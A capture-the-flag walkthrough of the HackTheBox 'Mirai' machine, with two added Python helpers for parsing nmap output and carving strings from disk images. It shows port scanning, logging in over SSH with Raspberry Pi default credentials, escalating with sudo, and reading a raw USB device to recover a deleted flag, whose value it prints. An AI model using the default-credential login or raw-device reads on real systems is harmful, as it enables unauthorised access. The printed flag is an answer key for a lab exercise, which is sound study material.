Mirai is an easy-rated Linux machine from HackTheBox created by Arrexel. It was strange to find nothing at the start. In this machine, it was essential to research the elements we found, mainly because of its IoT orientation. In the current post, my IP is 10.10.14.20, and the target’s IP is 10.129.210.160.
Gathering Information
First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
ping -c 1 10.129.210.160
Pinging 10.129.210.160 with 32 bytes of data:
Reply from 10.129.210.160: bytes=32 time=145ms TTL=63
Reply from 10.129.210.160: bytes=32 time=146ms TTL=63
Reply from 10.129.210.160: bytes=32 time=147ms TTL=63
Reply from 10.129.210.160: bytes=32 time=151ms TTL=63
Ping statistics for 10.129.210.160:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 145ms, Maximum = 151ms, Average = 147ms
The TTL is 63, close to the Linux default of 64 (one router hop decrements it by one), so it is a Linux machine.
Local Terminal
nmap -p- --open -T5 -v -n 10.129.210.160 -oG AllPorts
Completed SYN Stealth Scan at 20:44, 49.81s elapsed (65535 total ports)
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1501/tcp open sas-3
32400/tcp open plex
32469/tcp open unknown
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 50.30 seconds
Raw packets sent: 68926 (3.033MB) | Rcvd: 68952 (2.758MB)
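The open ports from this first scan are copied by hand into the second, targeted scan. As an added helper that is not part of the original post, this Python script does that step from the greppable (-oG) output; the AllPorts file itself is not reproduced in the post, so the sample below is a constructed line matching the ports found above.

```python
import re

# Constructed sample of nmap -oG output (the post does not include the real
# AllPorts file); the ports match the ones found in the scan above.
SAMPLE_GNMAP = (
    "# Nmap 7.92 scan initiated as: nmap -p- --open -T5 -v -n 10.129.210.160 -oG AllPorts\n"
    "Host: 10.129.210.160 ()\tStatus: Up\n"
    "Host: 10.129.210.160 ()\tPorts: 22/open/tcp//ssh///, 53/open/tcp//domain///, "
    "80/open/tcp//http///, 1501/open/tcp//sas-3///, 32400/open/tcp//plex///, "
    "32469/open/tcp//unknown///\tIgnored State: closed (65529)\n"
)

# Each entry in the Ports field looks like "22/open/tcp//ssh///".
PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)//")


def open_ports(gnmap_text: str) -> dict:
    """Map each host in greppable nmap output to its sorted list of open ports."""
    result = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field runs from "Ports:" to the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        ports = {int(p) for p, _proto in PORT_RE.findall(ports_field)}
        result[host] = sorted(set(result.get(host, [])) | ports)
    return result


def service_scan_command(host: str, ports: list, outfile: str = "WebScan") -> str:
    """Build the follow-up -sCV command the post runs against the discovered ports."""
    return f"nmap -sCV -p {','.join(map(str, ports))} {host} -oN {outfile}"


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(service_scan_command(host, ports))
```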
Local Terminal
nmap -sCV -p 22,53,80,1501,32400,32469 10.129.210.160 -oN WebScan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-07 20:53 Pacific SA Standard Time
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1501/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-title: Unauthorized
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here we have something unusual on port 53, "dnsmasq 2.76". After some research, it turns out to be free software that provides Domain Name System (DNS) services, and this version has a long list of known exploits; we will save it for later.
Local Terminal
curl -s -X GET http://10.129.210.160 -I
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Mon, 08 May 2023 01:31:47 GMT
Server: lighttpd/1.4.35
By using curl we get a new piece of relevant information, "Pi-hole". After some research, I found that it is an application to block ads and trackers, designed to run on embedded devices with network connectivity, like a Raspberry Pi.
The hint that this is a Raspberry Pi was pretty hidden, so it is worth trying the default credentials on the SSH port: {user: pi} {password: raspberry}.
Local Terminal
ssh pi@10.129.210.160
Exploit?
Target Terminal [Pi]
id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
Look what we found, group 27(sudo): we can use sudo to switch to root, and it will ask for the same default password... again!
Target Terminal [Pi]
sudo su
Target Root
root@raspberrypi:/home/pi# cd /home/pi
root@raspberrypi:/home/pi# ls -l
total 1440
-rw-r--r-- 1 pi pi 1441764 Aug 13 2017 background.jpg
drwxr-xr-x 3 pi pi 4096 Aug 13 2017 Desktop
drwxr-xr-x 5 pi pi 99 Dec 13 2016 Documents
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Downloads
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Music
drwxr-xr-x 3 pi pi 4096 Aug 13 2017 oldconffiles
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Pictures
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Public
drwxr-xr-x 2 pi pi 1629 Dec 13 2016 python_games
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Templates
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Videos
I tried with cat first, a bad idea; I found a lot of illegible information. Then, with cd /dev/, there are a lot of files. At this point the best option is to execute it; if it fails or we can't do anything, we can analyze the file with strings.
root@raspberrypi:/dev# strings /dev/sdb
.DXd.DXd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Aaaaand... the flag is in clear text. That was random; the machine is done.
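The reason strings on /dev/sdb recovers the "deleted" file is that unlinking a file only drops its directory entry; the data blocks keep their bytes until something overwrites them. The following Python example is added here and is not from the original post: over a constructed 4 KiB image (the flag value in it is a made-up placeholder), it carves printable runs the way strings does and reports the directory names and 32-hex tokens still present, the kind of check a defender runs on removable media before it is reused or disposed of.

```python
import re

# A 32-character lowercase hex token, the shape of the value found above.
FLAG_RE = re.compile(rb"^[0-9a-f]{32}$")


def carve_strings(image: bytes, min_len: int = 4):
    """Yield (offset, run) for every run of >= min_len printable ASCII bytes
    (0x20..0x7e), roughly the default rule of the strings tool."""
    start = None
    for i, b in enumerate(image):
        if 0x20 <= b < 0x7F:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                yield start, image[start:i]
            start = None
    if start is not None and len(image) - start >= min_len:
        yield start, image[start:]


def find_leftovers(image: bytes, names=("root.txt", "damnit.txt")) -> dict:
    """Report offsets of known filenames still in directory blocks, plus any
    flag-shaped token sitting in data blocks that were never zeroed."""
    wanted = {n.encode() for n in names}
    found = {"names": [], "flag_like": []}
    for off, run in carve_strings(image):
        if run in wanted:
            found["names"].append(off)
        elif FLAG_RE.match(run):
            found["flag_like"].append((off, run.decode()))
    return found


# Constructed image: a superblock-style last-mount-point field, one directory
# block listing the entries, then the unlinked file's data block, still intact.
BLOCK = 1024
IMAGE = bytearray(4 * BLOCK)
IMAGE[0:16] = b"/media/usbstick\x00"
IMAGE[BLOCK:BLOCK + 10] = b"lost+found"
IMAGE[BLOCK + 12:BLOCK + 20] = b"root.txt"
IMAGE[BLOCK + 24:BLOCK + 34] = b"damnit.txt"
IMAGE[2 * BLOCK:2 * BLOCK + 32] = b"0123456789abcdef0123456789abcdef"  # placeholder
IMAGE[3 * BLOCK:3 * BLOCK + 12] = b"Damnit! Sorr"

if __name__ == "__main__":
    print(find_leftovers(bytes(IMAGE)))
```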